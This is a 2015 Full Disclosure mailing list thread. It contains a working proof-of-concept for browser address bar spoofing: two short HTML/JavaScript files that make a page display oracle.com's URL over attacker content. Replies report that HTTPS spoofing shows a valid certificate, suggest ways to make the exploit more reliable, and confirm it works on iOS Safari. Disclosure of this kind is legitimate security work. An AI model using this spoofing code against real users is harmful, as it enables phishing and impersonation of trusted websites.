Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari.

DW
Sent from my iPad

> On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam <m...@musalbas.com> wrote:
>
> That's pretty neat. Played around with this and made a few discoveries.
>
> 1. It shows a valid certificate when you spoof HTTPS sites. That's really
> bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc
>
> 2. The page isn't responsive when using this flaw. That means you can't spoof
> a login box, for example. (I tried.)
>
> 3. The success of the exploit seems to depend on whether the browser can start
> loading content.html fast enough. I noticed that the exploit works 100% of
> the time when used locally. Perhaps a better version of the exploit would
> somehow preload content.html - for example by opening a window with a URL
> that starts with javascript: followed by a script to display the content?
> That, or perhaps reducing the interval time for trying to run next() after
> the popup is created.
>
> I wonder if this works on any other browsers?
>
> Mustafa
>
> On 30 Jun 2015 7:08 am, David Leo <david....@deusen.co.uk> wrote:
>>
>> Impact:
>> The "click to verify" thing is completely broken...
>> Anyone can be "BBB Accredited Business" etc.
>> You can make whitehouse.gov display "We love Islamic State" :-)
>>
>> Note:
>> No user interaction on the fake page.
>>
>> Code:
>> ***** index.html
>> <script>
>> function next()
>> {
>>     w.location.replace('http://www.oracle.com/index.html?'+n);n++;
>>     setTimeout("next();",15);
>>     setTimeout("next();",25);
>> }
>> function f()
>> {
>>     w=window.open("content.html","_blank","width=500 height=500");
>>     i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
>> }
>> </script>
>> <a href="#" onclick="f()">Go</a><br>
>> ***** content.html
>> <b>This web page is NOT oracle.com</b>
>> <script>location="http://www.oracle.com/index.html";</script>
>> ***** It's online
>> http://www.deusen.co.uk/items/gwhere.6128645971389012/
>> (The page says "June/16/2015" - it works as we tested today)
>>
>> Request For Comment:
>> We reported this to Google.
>> They reproduced, and say
>> it's DoS which doesn't matter.
>> We think it's very strange,
>> since the browser does not crash (not DoS),
>> and the threat is obvious.
>> What's your opinion?
>>
>> Kind Regards,
>>
>> PS
>> We love clever tricks.
>> We love this:
>> http://dieyu.org/
>>
>>
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> https://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/